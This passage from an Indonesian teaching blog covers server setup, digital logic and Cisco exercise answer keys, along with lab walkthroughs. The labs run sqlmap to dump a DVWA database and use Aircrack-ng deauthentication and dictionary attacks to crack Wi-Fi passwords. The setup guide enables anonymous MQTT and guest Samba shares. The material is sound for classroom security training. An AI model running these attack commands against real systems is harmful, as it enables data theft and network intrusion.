5. 🐘 PHP (Untuk Web Server Dinamis)

sudo apt install php libapache2-mod-php php-mysql -y
echo "" | sudo tee /var/www/html/info.php

Cek: http://IP-Server/info.php

6. 🐬 MySQL Server

sudo apt install mysql-server -y
sudo mysql_secure_installation

Membuat DB dan User:

CREATE DATABASE dbku;
CREATE USER 'userku'@'localhost' IDENTIFIED BY 'passwordku';
GRANT ALL PRIVILEGES ON dbku.* TO 'userku'@'localhost';
FLUSH PRIVILEGES;

7. 🐍 Python & Pip

sudo apt install python3 python3-pip python3-venv -y
python3 --version
pip3 --version

Opsional:

python3 -m venv env
source env/bin/activate

8. 📡 Mosquitto MQTT Broker

sudo apt install mosquitto mosquitto-clients -y
sudo systemctl enable mosquitto

Konfigurasi:

sudo nano /etc/mosquitto/mosquitto.conf

Tambahkan:

allow_anonymous true
listener 1883

Restart:

sudo systemctl restart mosquitto

Tes:

mosquitto_sub -h localhost -t topikku &
mosquitto_pub -h localhost -t topikku -m "halo dari broker mqtt"

9. 🗂️ FTP Server (vsftpd)

sudo apt install vsftpd -y
sudo nano /etc/vsftpd.conf

Ubah:

write_enable=YES
local_enable=YES

Restart:

sudo systemctl restart vsftpd

sudo apt install samba -y
sudo mkdir -p /srv/sambashare
sudo chown nobody:nogroup /srv/sambashare
sudo nano /etc/samba/smb.conf

Tambahkan:

[Shared]
path = /srv/sambashare
browseable = yes
read only = no
guest ok = yes

Restart:

sudo systemctl restart smbd

11. 🌐 DHCP Server

sudo apt install isc-dhcp-server -y
sudo nano /etc/dhcp/dhcpd.conf

Contoh konfigurasi:

subnet 192.168.56.0 netmask 255.255.255.0 {
  range 192.168.56.100 192.168.56.200;
  option routers 192.168.56.1;
  option domain-name-servers 8.8.8.8;
}

Pilih interface:

sudo nano /etc/default/isc-dhcp-server
INTERFACESv4="enp0s3"

Restart:

sudo systemctl restart isc-dhcp-server

12. 🖥️ DNS Server (Bind9)

sudo apt install bind9 bind9utils bind9-doc -y
sudo nano /etc/bind/named.conf.local

Contoh konfigurasi:

zone "example.local" {
    type master;
    file "/etc/bind/db.example.local";
};

zone "56.168.192.in-addr.arpa" {
    type master;
    file "/etc/bind/db.192";
}

Restart:

sudo systemctl restart bind9

13. 🛡️ Fail2Ban

sudo apt install fail2ban -y
sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local
sudo nano /etc/fail2ban/jail.local

Aktifkan SSH:

[sshd]
enabled = true

Restart:

sudo systemctl restart fail2ban

14. 🛡️ Zerotier

curl -s https://install.zerotier.com | sudo bash

Jika ada GPG terinstall, Option yang lebih aman juga tersedia:

curl -s 'https://raw.githubusercontent.com/zerotier/ZeroTierOne/main/doc/contact%40zerotier.com.gpg' | gpg --import && \
if z=$(curl -s 'https://install.zerotier.com/' | gpg); then echo "$z" | sudo bash; fi

Setelah install, jangan lupa update package nya menggunakan apt / yum update.

Untuk cek apakah zerotier sudah terinstall di server, maka masukkan perintah berikut ini:

sudo zerotier-cli status

kemudian untuk konek ke dalam jaringan zerotier, maka masukkan perintah berikut ini:

sudo zerotier-cli join

✅ Penutup

Dengan layanan di atas, server Anda siap:

Menyediakan web dan database dinamis
Mengatur komunikasi IoT
Berbagi file lintas sistem
Mengatur IP dan DNS lokal
Mengelola keamanan akses

Instalasi Ubuntu Server di VirtualBox

Hasan Amin — Thu, 22 May 2025 07:10:24 GMT

Menginstal Ubuntu Server di VirtualBox adalah cara praktis untuk belajar administrasi server tanpa harus menggunakan perangkat fisik tambahan. Berikut ini panduan lengkap mulai dari pengunduhan hingga konfigurasi awal server.

🧰 Persiapan

1. Download Software yang Dibutuhkan

a. VirtualBox

Unduh VirtualBox dari situs resmi:
🔗 https://www.virtualbox.org/

b. Ubuntu Server ISO

Unduh versi LTS terbaru dari Ubuntu Server:
🔗 https://ubuntu.com/download/server

Contoh: ubuntu-22.04.4-live-server-amd64.iso

🛠️ Langkah-Langkah Instalasi

2. Buat Mesin Virtual Baru

Buka VirtualBox, klik tombol "New".
Isi informasi:
- Name: Ubuntu-Server
- ISO Image: File iso ubuntu server nya
- Type: Linux
- Version: Ubuntu (64-bit)
- Ceklik skip Unattended Installation
Klik Next, lalu atur Hardware:
- RAM: Minimal 1024 MB (disarankan 2048 MB)
- CPU: Minimal 1 (disarankan 2 cpu)
Pilih "Create a virtual hard disk now", lalu klik Create.
Pilih VDI (VirtualBox Disk Image) → Dynamically allocated.
Tentukan ukuran hard disk virtual:
- Ukuran: Minimal 10 GB (disarankan 20 GB)
Klik Finish

4. Proses Intsalasi

Klik Start untuk menyalakan mesin virtual.
Proses boot akan dimulai dari file ISO. → tekan Enter.
Pilih bahasa sesuai kebutuhan. → tekan Enter.
Pilih Continue Without Updating → tekan Enter.
Biasanya otomatis mendeteksi, jika tidak, pilih English (US) atau sesuai kebutuhan.. Done → tekan Enter.
Pilih Install OpenSSH server agar bisa akses server via SSH nanti. Done → tekan Enter.
Pengaturan Jaringan
- Jika ada DHCP, jaringan akan otomatis terdeteksi.
- Jika tidak, atur IP secara manual.
- Atau biarkan default agar bisa di setup nanti
- Done → tekan Enter.

Proxy Address: Kosongkan. Done → tekan Enter.
Partisi Disk
- Pilih Use entire disk → lanjutkan.
- Konfirmasi dengan memilih Done dan Continue.

Nama Server & Username
- Full name: Nama Lengkap
- Server name: server
- Username: ubuntu
- Password: (isi sesuai keinginan)
- Done → tekan Enter.

Gunakan spasi untuk memilih Skip for now. Continue → tekan Enter.

Instalasi OpenSSH

Pilih Install OpenSSH server dengan klik tombol spasi agar bisa akses server via SSH nanti.
Done→ tekan Enter.

Pilih Snap / Fitur Tambahan

Lewati atau pilih sesuai kebutuhan (misal: Docker, Ansible, dll).
Done→ tekan Enter.

Instalasi Dimulai
- Tunggu hingga proses instalasi selesai (sekitar 5–10 menit).

Reboot

Setelah selesai, pilih Reboot Now.
Eject ISO agar tidak boot ulang ke installer:
- Klik kanan ikon CD → Remove disk from virtual drive.
- Jika sudah otomatis tereject biarkan saja

Setelah reboot:

Login dengan username dan password yang dibuat saat instalasi.
Password tidak akan muncul saat di ketik, jadi harus yakin bahwa password nya benar
Ketik perintah dasar seperti:

sudo apt update

🧪 Tips Tambahan (Opsional)

Snapshot: Sebelum mengutak-atik sistem, ambil snapshot di VirtualBox.
Bridged Network: Agar server bisa diakses dari luar (misal via SSH), ubah adapter dari NAT ke Bridged Adapter di pengaturan jaringan mesin virtual.

Simulasi Penyerangan Database Menggunakan Kali Linux

Hasan Amin — Wed, 21 May 2025 11:47:37 GMT

⚠️ Disclaimer

Simulasi ini hanya boleh dilakukan di lingkungan lokal (localhost) untuk tujuan pembelajaran. Jangan pernah melakukan ini di sistem yang tidak kamu miliki izin penuh.

🎯 Tujuan Simulasi

Mempelajari bagaimana SQL Injection bekerja
Menggunakan sqlmap untuk menguji kerentanan database
Menunjukkan pentingnya validasi input dan pengamanan query di backend

🧰 Tools yang Digunakan

Kali Linux
XAMPP / Apache + MySQL (server lokal)
sqlmap (sudah tersedia di Kali Linux)
Aplikasi web rentan: DVWA (Damn Vulnerable Web Application)

🏗️ Langkah-Langkah Praktikum

1. Install DVWA di Mesin Target (localhost)

Di Kali atau Ubuntu server:

sudo apt update
sudo apt install apache2 mariadb-server php php-mysqli git -y
cd /var/www/html
sudo git clone https://github.com/digininja/DVWA.git
sudo chown -R www-data:www-data DVWA

2. Konfigurasi Database DVWA

sudo mysql -u root

Di prompt MySQL:

CREATE DATABASE dvwa;
CREATE USER 'dvwauser'@'localhost' IDENTIFIED BY 'dvwapass';
GRANT ALL PRIVILEGES ON dvwa.* TO 'dvwauser'@'localhost';
FLUSH PRIVILEGES;
EXIT;

Edit file DVWA/config/config.inc.php:

$_DVWA[ 'db_user' ] = 'dvwauser';
$_DVWA[ 'db_password' ] = 'dvwapass';

3. Jalankan Apache dan MySQL

sudo systemctl start apache2
sudo systemctl start mysql

Akses DVWA di browser:

http://localhost/DVWA/setup.php

Klik Create / Reset Database.

Set Security Level ke "Low".

🧪 Simulasi Serangan SQL Injection

1. Akses Target

Cek halaman login atau halaman dengan parameter GET (misal: id=1):

http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#

2. Jalankan sqlmap

Buka terminal di Kali Linux dan jalankan:

sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=..." --dbs

📝 Ganti PHPSESSID=... dengan session cookie dari browser.

sqlmap akan mendeteksi dan menampilkan database yang tersedia.

3. Dump Isi Database

Setelah tahu nama databasenya, misalnya dvwa, lakukan dump tabel:

sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="..." -D dvwa --tables
sqlmap -u "..." --cookie="..." -D dvwa -T users --dump

🔍 Hasil yang Didapat

Nama-nama database dan tabel terbuka
Data user seperti username dan password berhasil diambil
Menunjukkan betapa berbahayanya input tanpa filter

🛡️ Tindakan Pencegahan

Gunakan prepared statements di backend.
Validasi semua input dari user.
Jangan tampilkan error SQL ke user.
Gunakan WAF (Web Application Firewall).
Selalu update dan patch sistem.

✅ Kesimpulan

Simulasi ini menunjukkan betapa mudahnya database bisa diretas jika:

Tidak ada sanitasi input
Aplikasi tidak aman
Sistem terlalu terbuka

💡 Praktikum ini bukan hanya tentang menyerang, tapi membuka mata bahwa keamanan web dan database adalah tanggung jawab utama developer & sysadmin.

Database Multilevel

Hasan Amin — Wed, 21 May 2025 11:44:00 GMT

📌 Apa Itu Database Multilevel?

Database Multilevel adalah jenis database yang menyimpan data dengan level keamanan berbeda-beda. Ini seperti menyimpan data di laci-laci yang hanya bisa dibuka oleh orang dengan kunci (akses) tertentu.

🔐 Tujuannya: Mencegah pengguna dengan hak akses rendah mengakses data yang sensitif atau rahasia.

🧠 Analogi Super Gampang

Bayangkan kamu bekerja di sebuah kantor:

Pegawai biasa hanya bisa buka laci meja berlabel "Publik".
Manajer bisa buka laci "Publik" dan "Rahasia Tim".
Direktur bisa buka semua laci, termasuk "Sangat Rahasia".

Setiap laci = level keamanan data.
Setiap orang = user dengan level akses berbeda.
Sistem ini memastikan hanya orang yang tepat melihat data yang tepat.

📚 Studi Kasus Sederhana

🎯 Kasus: Sistem Database Militer

Bayangkan ada database militer berisi:

Data personil umum: bisa diakses oleh semua anggota.
Rencana operasi: hanya bisa diakses oleh perwira.
Intelijen rahasia: hanya bisa diakses oleh jenderal.

Tanpa sistem multilevel, tentara biasa bisa lihat data rahasia.
Dengan sistem multilevel, akses dibatasi sesuai level keamanan.

🧪 Praktikum: Uji Coba Sistem Multilevel Access di Kali Linux

💡 Tujuan: Mensimulasikan pembatasan akses ke file/direktori berdasarkan security level dengan user yang berbeda.

🔧 Persiapan

Gunakan Kali Linux (bisa pakai VirtualBox/VMware).

Buat 3 user:

 sudo adduser user_biasa
 sudo adduser user_perwira
 sudo adduser user_jenderal

Buat grup:

 sudo groupadd level_rahasia
 sudo groupadd level_sangat_rahasia

Tambahkan user ke grup:

 sudo usermod -aG level_rahasia user_perwira
 sudo usermod -aG level_sangat_rahasia user_jenderal

📁 Simulasi Direktori Multilevel

Buat folder dan file:

 sudo mkdir /multilevel_data
 cd /multilevel_data
 sudo mkdir publik rahasia sangat_rahasia

 echo "Ini data publik" | sudo tee publik/data.txt
 echo "Ini data rahasia" | sudo tee rahasia/data.txt
 echo "Ini data sangat rahasia" | sudo tee sangat_rahasia/data.txt

Set hak akses:

 # Publik: semua boleh baca
 sudo chmod 755 publik

 # Rahasia: hanya grup level_rahasia
 sudo chown :level_rahasia rahasia
 sudo chmod 770 rahasia

 # Sangat Rahasia: hanya grup level_sangat_rahasia
 sudo chown :level_sangat_rahasia sangat_rahasia
 sudo chmod 770 sangat_rahasia

🔍 Pengujian Akses (Simulasi Pelanggaran)

su - user_biasa
cd /multilevel_data/rahasia

➡️ Harusnya akan muncul Permission Denied.

su - user_perwira
cd /multilevel_data/rahasia
cat data.txt  # Bisa dibaca

su - user_jenderal
cd /multilevel_data/sangat_rahasia
cat data.txt  # Bisa dibaca

⚠️ Apa yang Bisa Dipelajari?

Sistem ini melindungi data sensitif berdasarkan level.
Pengguna tidak bisa mengakses data di luar haknya.
Simulasi ini penting untuk dipahami oleh siapa pun yang membangun sistem keamanan.

🚀 Kesimpulan

Database Multilevel adalah pendekatan penting dalam dunia cybersecurity.
Dengan membatasi akses berdasarkan level, kita bisa menjaga data tetap aman di lingkungan yang kompleks — seperti militer, pemerintahan, atau bahkan perusahaan teknologi.

🛡️ Dalam dunia yang makin rawan kebocoran data, pendekatan multilevel adalah benteng pertahanan pertama yang wajib dipahami.

Multiplexer dan Pengecekan Kesalahan Paritas

Hasan Amin — Wed, 21 May 2025 11:32:18 GMT

🔀 Multiplexer dan Paritas: Teori, Fungsi, Contoh, dan Analogi Paling Gampang!

Yuk bahas dua topik penting dalam dunia elektronika digital dan komunikasi data: Multiplexer (MUX) dan Paritas. Lengkap dari teori sampai contoh praktisnya!

🎛️ Multiplexer

📘 Definisi Teori

Multiplexer (MUX) adalah komponen logika digital yang berfungsi untuk memilih satu dari beberapa sinyal input dan meneruskannya ke satu jalur output berdasarkan sinyal kontrol (selector).

MUX dikenal juga sebagai data selector, karena ia memilih satu input dari banyak jalur.

❓ Kenapa Harus Ada Multiplexer?

Tanpa MUX, jika kita ingin membaca banyak sinyal input (misalnya sensor) secara paralel, maka:

Dibutuhkan banyak pin input pada mikrokontroler
Menyulitkan routing sinyal pada sistem digital

👉 Multiplexer menghemat jalur koneksi, karena cukup satu jalur output yang bisa digunakan untuk banyak input.

🎯 Digunakan Untuk Apa?

Beberapa penggunaan multiplexer dalam dunia nyata:

Menggabungkan banyak sensor ke satu pin analog mikrokontroler
Menyalurkan data dari berbagai sumber ke satu saluran komunikasi
Implementasi dalam CPU, seperti memilih data dari register atau ALU
Menyederhanakan rangkaian logika

🤔 Analogi Simpel

Bayangkan kamu bekerja di restoran dengan 4 juru masak. Kamu hanya punya 1 interkom untuk berbicara. Lalu kamu bilang:

“Sekarang sambungkan ke koki nomor 2.”

📌 Di sini:

Kamu = Selector
4 juru masak = Input
Interkom = Output
Orang yang memilih = MUX

MUX menghubungkan satu input yang dipilih ke satu output.

💡 Contoh dan Studi Kasus

Kasus:

Kamu membuat sistem monitoring suhu untuk 4 ruangan berbeda (sensor A, B, C, D), tapi mikrokontrolermu cuma punya 1 pin analog input.

Solusi:

Gunakan MUX 4-to-1. Sambungkan:

I0 = Sensor A
I1 = Sensor B
I2 = Sensor C
I3 = Sensor D

Gunakan 2 bit selector untuk memilih input mana yang dibaca.

| S1 | S0 | Output |
|----|----|--------|
| 0  | 0  | I0     |
| 0  | 1  | I1     |
| 1  | 0  | I2     |
| 1  | 1  | I3     |

➡️ Sekarang kamu bisa membaca semua sensor satu per satu melalui satu pin saja.

🧮 Paritas

📘 Definisi Teori

Paritas adalah teknik dalam sistem komunikasi digital untuk mendeteksi kesalahan (error detection) dalam pengiriman data.
Caranya adalah dengan menambahkan satu bit ekstra (disebut bit paritas) ke dalam data biner, agar penerima bisa memverifikasi apakah data diterima dengan benar.

❓ Kenapa Harus Ada Paritas?

Dalam komunikasi digital (misalnya pengiriman data via kabel atau udara), data bisa rusak karena noise, gangguan elektromagnetik, atau kerusakan perangkat keras.

Tanpa metode pengecekan seperti bit paritas, maka:

Data rusak tidak terdeteksi
Bisa menyebabkan kesalahan informasi, perhitungan, atau bahkan kerusakan sistem

Dengan paritas, sistem bisa mengecek sendiri apakah data masuk valid atau perlu dikirim ulang.

🎯 Digunakan Untuk Apa?

Protokol komunikasi serial (UART, RS-232, dsb.)
Memory RAM yang dilengkapi deteksi error (Parity RAM)
Komunikasi antar perangkat embedded
Sistem safety-critical seperti peralatan medis atau industri

🤔 Analogi Sederhana

Bayangkan kamu mengirimkan 4 kelereng ke temanmu, dan bilang:

“Saya kirim dalam jumlah genap ya!”

Kalau temanmu hanya menerima 3 kelereng, dia tahu: “Oh, ini gak genap. Berarti ada yang hilang.”

📌 Sama halnya dengan bit paritas:

Jika data 4 bit adalah 1011, jumlah bit 1 = 3 (ganjil)
Kamu ingin genap → tambah bit paritas = 1
Data jadi 10111

Kalau bit terganggu, penerima bisa tahu data salah hanya dengan menghitung jumlah 1-nya.

💡 Contoh dan Studi Kasus

Kasus:

Sebuah sensor mengirimkan data 8 bit ke mikrokontroler. Untuk memastikan data diterima benar, digunakan bit paritas genap.

Data yang dikirim:

11010110 (jumlah bit 1 = 4 → genap)
Bit paritas = 0
Data dikirim: 110101100

Jika data diterima berubah jadi 100101100 (jumlah bit 1 = 3 → ganjil), maka mikrokontroler tahu data rusak.

➡️ Solusi: minta pengiriman ulang.

🧩 Kesimpulan

Topik	Definisi Teori	Fungsi Utama	Digunakan Dalam
Multiplexer	Rangkaian digital untuk memilih satu dari banyak input	Hemat jalur input, seleksi data	Sensor ke mikrokontroler, CPU, sistem kontrol
Paritas	Metode pengecekan error dengan menambahkan bit ekstra	Deteksi kerusakan data	Komunikasi digital, memori RAM, sistem safety-critical

🚀 Penutup

Sekarang kamu sudah paham:

Multiplexer = “si pemilih input”
Paritas = “si detektor error”

Dua konsep ini sederhana tapi sangat fundamental dalam sistem digital dan komunikasi. Jangan lupa latihan soal dan coba aplikasikan di Arduino, ESP32, atau proyek mikrokontrolermu.

Mengenal Aircrack

Hasan Amin — Mon, 19 May 2025 11:53:47 GMT

📌 Apa itu Aircrack-ng?

Aircrack-ng adalah rangkaian tools untuk menilai keamanan jaringan Wi-Fi, dengan kemampuan untuk menangkap paket, melakukan deauth, dan crack password WEP/WPA/WPA2 menggunakan brute-force dictionary attacks.

🎓 Tujuan Simulasi

Memahami cara kerja serangan terhadap jaringan Wi-Fi
Mengenal langkah-langkah ethical hacking
Praktik penggunaan tools dasar pentest di sistem Linux (Kali Linux)

🧰 Persiapan Alat

Perangkat Lunak

OS: Kali Linux (direkomendasikan)
Tools: Aircrack-ng (sudah terinstal di Kali)

Perangkat Keras

Laptop dengan Wi-Fi adapter yang mendukung mode monitor
- Contoh chipset: Atheros, Realtek, atau Alfa AWUS036NHA

🧪 Langkah Simulasi

1. Cek Interface Wireless

iwconfig

Contoh output:

wlan0     IEEE 802.11  Mode:Managed  Access Point: Not-Associated

2. Aktifkan Mode Monitor

sudo airmon-ng start wlan0

Akan menghasilkan interface baru seperti wlan0mon.

3. Lakukan Scan Jaringan Sekitar

sudo airodump-ng wlan0mon

Tunggu sampai terlihat BSSID dan channel target (gunakan jaringan dummy/lab).

4. Fokus ke Target Access Point

sudo airodump-ng --bssid  -c  -w hasil wlan0mon

Keterangan:

: MAC address AP target
: channel AP target
-w hasil: menyimpan hasil capture ke file hasil.cap

5. Lakukan Serangan Deauthentication (Opsional)

Untuk memaksa client reconnect dan mendapatkan handshake:

sudo aireplay-ng --deauth 10 -a  wlan0mon

6. Crack Password Wi-Fi (WPA/WPA2)

Setelah handshake tertangkap (hasil.cap), gunakan dictionary wordlist:

aircrack-ng hasil.cap -w /usr/share/wordlists/rockyou.txt

✅ Tips untuk Simulasi Kelas

Gunakan AP dummy dengan password yang ada di wordlist.
Uji hanya di jaringan lab yang disediakan dosen/instruktur.
Diskusikan etika dan legalitas hacking di awal materi.
Minta siswa membuat laporan hasil simulasi dan refleksi etis.

🛡️ Penutup

Aircrack-ng merupakan tool yang powerful dalam dunia cybersecurity. Dengan pendekatan etis dan simulasi yang legal, siswa dapat belajar bagaimana melindungi sistem dengan lebih baik, karena memahami cara kerja serangan adalah langkah pertama untuk membuat pertahanan yang kuat.

🔗 Referensi

Aircrack-ng Official Site
Kali Linux Tools

04. Penguatan Keamanan Akses Administrator Jaringan

Hasan Amin — Sun, 13 Apr 2025 02:50:31 GMT

📄 Studi Kasus:

Administrator menemukan router menggunakan akun default tanpa pengamanan tambahan. Untuk menghindari penyusupan dan brute-force attack, kamu diminta mengamankan akses ke perangkat jaringan.

🎯 Tugas:

Hapus akun default cisco dan buat akun baru admin (akses penuh) dan monitor (akses terbatas).
Aktifkan enkripsi password.
Terapkan batasan login dan waktu idle sebelum logout otomatis.
Tampilkan daftar akun dan hak akses untuk verifikasi.
Aktifkan logging untuk memantau aktivitas login pengguna.

📸 Dokumentasi:

✔ Screenshot hasil konfigurasi dan show command
✔ Catatan log login pengguna
✔ Ringkasan konfigurasi keamanan akun

✅ Kunci Jawaban – Konfigurasi Lengkap Cisco

Router> enable
Router# configure terminal
Enter configuration commands, one per line. End with CNTL/Z.

! Hapus akun default (jika ada)
Router(config)# no username cisco

! Tambahkan akun admin dan monitor
Router(config)# username admin privilege 15 secret StrongP@ssw0rd
Router(config)# username monitor privilege 5 secret ViewOnly123

! Aktifkan enkripsi password
Router(config)# service password-encryption

! Batasi login untuk cegah brute-force
Router(config)# login block-for 120 attempts 3 within 60

! Atur timeout idle untuk sesi VTY
Router(config)# line vty 0 4
Router(config-line)# exec-timeout 5 0
Router(config-line)# login local
Router(config-line)# transport input ssh
Router(config-line)# exit

! Selesai konfigurasi
Router(config)# end
Router# write memory

🔍 Verifikasi:

Router# show running-config | include username
Router# show running-config | include privilege
Router# show login
Router# show users
Router# show logging

09. Backup dan Restore Konfigurasi Router

Hasan Amin — Sun, 13 Apr 2025 02:48:26 GMT

📄 Studi Kasus:

Administrator jaringan perlu melakukan pemeliharaan sistem yang mengharuskan perangkat router di-reboot. Untuk menghindari kehilangan konfigurasi penting saat proses tersebut, Anda diminta untuk membackup konfigurasi ke server TFTP, kemudian mengembalikannya (restore) untuk memastikan konfigurasi tetap tersedia dan sistem berjalan normal kembali.

🎯 Tugas:

Lakukan backup konfigurasi startup router ke TFTP Server.
Simulasikan kehilangan konfigurasi dengan menghapus isi konfigurasi.
Lakukan restore konfigurasi dari TFTP server ke router.
Verifikasi bahwa router kembali memiliki konfigurasi awal dan jaringan berjalan normal.

📸 Dokumentasi yang harus dikumpulkan:

✔ Screenshot proses backup dan restore
✔ Output verifikasi konfigurasi setelah restore (show running-config, ping)

✅ Kunci Jawaban Soal Training No. 8

🧩 Langkah 1: Pastikan Router Terhubung ke TFTP Server

Router# ping 192.168.1.100

🧩 Langkah 2: Backup Konfigurasi ke TFTP

Router# copy startup-config tftp:
Address or name of remote host []? 192.168.1.100
Destination filename [startup-config]? R1-backup.cfg

✔️ File R1-backup.cfg akan tersimpan di direktori TFTP Server

🧩 Langkah 3: Ubah Beberapa Konfigurasi Router

Untuk uji coba restore konfigurasi, kita akan lakukan perubahan sederhana contohnya IP pada interface Serial0/1/0 yang menghubungkan dengan Router2 melalui OSPF

Router# interface Serial0/1/0
Router# configure terminal
Router(config)# ip address 10.10.10.1 255.255.255.252
Router(config-if)# no shutdown
Router(config-if)# end
Router# write memory

Setelah itu maka router tidak akan bisa terhubung melalui OSPF

🧩 Langkah 4: Restore Konfigurasi dari TFTP

Setelah reload:

Router> enable
Router# copy tftp: startup-config
Address or name of remote host []? 192.168.1.100
Source filename []? R1-backup.cfg
Destination filename [startup-config]? [ENTER]

Kemudian lakukan reload ulang:

Router# reload

🧪 Verifikasi:

Router# show running-config
Router# ping 192.168.1.1

📝 Laporan Singkat:

Masalah:
Konfigurasi router perlu diamankan sebelum proses reboot/pemeliharaan.

Solusi:
Konfigurasi disimpan ke TFTP, lalu diuji dengan menghapus dan me-restore ulang.

Hasil:
Konfigurasi berhasil dikembalikan, jaringan kembali normal.

08. Mengoptimalkan Kinerja Sistem Jaringan

Hasan Amin — Sun, 13 Apr 2025 02:38:31 GMT

📄 Studi Kasus:

Lalu lintas data umum yang padat menyebabkan keterlambatan (latensi) pada layanan VoIP di jaringan perusahaan. Administrator diminta untuk mengoptimalkan kinerja jaringan dengan menerapkan Quality of Service (QoS) agar trafik VoIP mendapatkan prioritas bandwidth tertinggi.

🎯 Tugas:

Buat konfigurasi QoS untuk memberikan prioritas tertinggi pada trafik VoIP (misalnya berdasarkan port UDP 5060 atau DSCP value).
Terapkan kebijakan QoS tersebut pada interface keluar (egress interface) yang menangani trafik VoIP.
Uji efektivitas konfigurasi QoS dengan membandingkan kondisi sebelum dan sesudah (misalnya menggunakan show policy-map).

📸 Dokumentasi yang harus dikumpulkan:

✔ Screenshot hasil konfigurasi QoS
✔ Screenshot hasil pengujian penggunaan bandwidth sebelum dan sesudah QoS diterapkan

✅ Kunci Jawaban Soal Training No. 7

🧩 Langkah 1: Buat Class-map untuk Trafik VoIP

Router(config)# class-map match-any VOIP-TRAFFIC
Router(config-cmap)# match protocol rtp
Router(config-cmap)# match access-group 101

Atau gunakan access list:

Router(config)# access-list 101 permit udp any any eq 5060

🧩 Langkah 2: Buat Policy-map untuk QoS

Router(config)# policy-map PRIORITIZE-VOIP
Router(config-pmap)# class VOIP-TRAFFIC
Router(config-pmap-c)# priority percent 70
Router(config-pmap-c)# exit
Router(config-pmap)# class class-default
Router(config-pmap-c)# fair-queue

🧩 Langkah 3: Terapkan Policy QoS ke Interface

Misal interface ke arah pengguna:

Router(config)# interface GigabitEthernet0/0/0
Router(config-if)# service-policy output PRIORITIZE-VOIP

🧪 Langkah 4: Verifikasi Konfigurasi QoS

Router# show policy-map interface GigabitEthernet0/0/0

Output akan menampilkan statistik penggunaan bandwidth dan apakah trafik VoIP mendapatkan prioritas.

📝 Laporan Singkat:

Masalah:
Trafik VoIP mengalami latensi tinggi karena bandwidth digunakan oleh data umum.

Solusi:
Diterapkan QoS dengan memberikan prioritas 70% bandwidth untuk trafik VoIP (port 5060).

Hasil:
Setelah QoS aktif, penggunaan bandwidth lebih stabil dan trafik VoIP tidak mengalami keterlambatan.

07. Memperbaiki Konfigurasi Jaringan

Hasan Amin — Sun, 13 Apr 2025 02:34:02 GMT

📄 Studi Kasus:

Ditemukan bahwa salah satu router di jaringan memiliki konfigurasi subnet mask yang tidak sesuai. Akibatnya, perangkat dari subnet lain tidak dapat terhubung dan komunikasi jaringan terganggu. Sebagai administrator, Anda diminta memperbaiki kesalahan konfigurasi tersebut agar jaringan dapat berfungsi normal kembali.

🎯 Tugas:

Identifikasi konfigurasi IP dan subnet mask yang salah pada salah satu router.
Perbaiki subnet mask agar sesuai dengan topologi jaringan (gunakan /24 atau 255.255.255.0).
Uji konektivitas jaringan setelah perbaikan untuk memastikan komunikasi antar perangkat berhasil.

📸 Dokumentasi yang harus dikumpulkan:

✔ Screenshot konfigurasi IP sebelum dan sesudah perbaikan
✔ Screenshot hasil uji koneksi antar perangkat setelah perbaikan

✅ Kunci Jawaban Soal Training No. 6

🔍 Langkah 1: Identifikasi

Masuk ke router yang diduga bermasalah, lalu periksa konfigurasi IP-nya:

Router> enable
Router# show ip interface brief

Hasil:

Interface         IP-Address     OK? Method Status     Protocol
FastEthernet0/0   192.168.2.1    YES manual up         up

Lalu periksa konfigurasi lengkap:

Router# show running-config

Ditemukan subnet mask salah, misalnya:

interface FastEthernet0/0
 ip address 192.168.2.1 255.255.0.0

Padahal seharusnya 255.255.255.0 (untuk jaringan 192.168.2.0/24).

🛠️ Langkah 2: Perbaikan

Masuk ke mode konfigurasi dan ubah subnet mask:

Router# configure terminal
Router(config)# interface FastEthernet0/0
Router(config-if)# ip address 192.168.2.1 255.255.255.0
Router(config-if)# no shutdown

Simpan konfigurasi:

Router# write memory

🔎 Langkah 3: Verifikasi

Lakukan ping dari PC di jaringan lain ke router yang diperbaiki:

PC> ping 192.168.2.1

Jika reply diterima, maka konfigurasi berhasil.

📝 Ringkasan Laporan:

Masalah:
Router menggunakan subnet mask yang salah (255.255.0.0), menyebabkan gangguan komunikasi.

Solusi:
Mengganti subnet mask menjadi 255.255.255.0 sesuai topologi.

Hasil:
Setelah konfigurasi diperbaiki, perangkat dari jaringan lain dapat kembali berkomunikasi.

06 – Mengidentifikasi Sumber Gangguan Jaringan

Hasan Amin — Sun, 13 Apr 2025 02:08:45 GMT

📚 Studi Kasus:

Seorang karyawan dari Kantor 2 (192.168.2.0/24) melaporkan bahwa dia tidak bisa membuka website internal yang ada di server pusat Kantor 1 (192.168.1.10). Sebelumnya tidak ada masalah.

Sebagai administrator jaringan, kamu harus:

Menelusuri jalur koneksi dari PC di Kantor 2 ke server di Kantor 1.
Mengidentifikasi penyebab gangguan koneksi.
Memperbaiki konfigurasi jika ditemukan masalah.

🎯 Tugas:

Jalankan perintah troubleshooting seperti ping, tracert, dan ipconfig untuk menelusuri koneksi.
Cek konfigurasi IP, gateway, dan routing pada router.
Perbaiki masalah jika ditemukan.
Pastikan PC di Kantor 2 bisa mengakses server di Kantor 1 setelah perbaikan.

📸 Dokumentasi yang harus dikumpulkan:

✔ Screenshot hasil perintah troubleshooting (ping, tracert, ipconfig)
✔ Laporan singkat penyebab masalah dan langkah penyelesaiannya

✅ Kunci Jawaban Soal Training No. 5 – Versi Topologi Sebelumnya

🛠️ Langkah Troubleshooting:

Di PC Kantor 2 (192.168.2.x):

C:\> ipconfig

Cek apakah:

IP dan subnet benar (misalnya 192.168.2.10 /24)
Gateway adalah 192.168.2.1

Lalu:

C:\> ping 192.168.2.1         :: cek gateway lokal
C:\> ping 192.168.1.10        :: cek server di kantor 1
C:\> tracert 192.168.1.10     :: lihat jalur routing

⚠️ Masalah yang Mungkin Ditemukan:

Gateway PC salah → misalnya 192.168.2.5, padahal seharusnya 192.168.2.1
Tidak ada route di router antar kantor → routing OSPF belum mengiklankan subnet tertentu
Ada access list yang memblokir traffic antar kantor

🧰 Solusi yang Diberikan:

Misalnya ditemukan gateway salah:

> Perbaiki konfigurasi IP di PC
Gateway → ubah ke: 192.168.2.1

Jika masalah routing:

Router(config)# router ospf 1
Router(config-router)# network 192.168.2.0 0.0.0.255 area 0

📝 Contoh Laporan Jawaban:

Masalah:
Gateway pada PC di Kantor 2 salah dikonfigurasi (192.168.2.5) sehingga tidak bisa melewati router menuju Kantor 1.

Solusi:
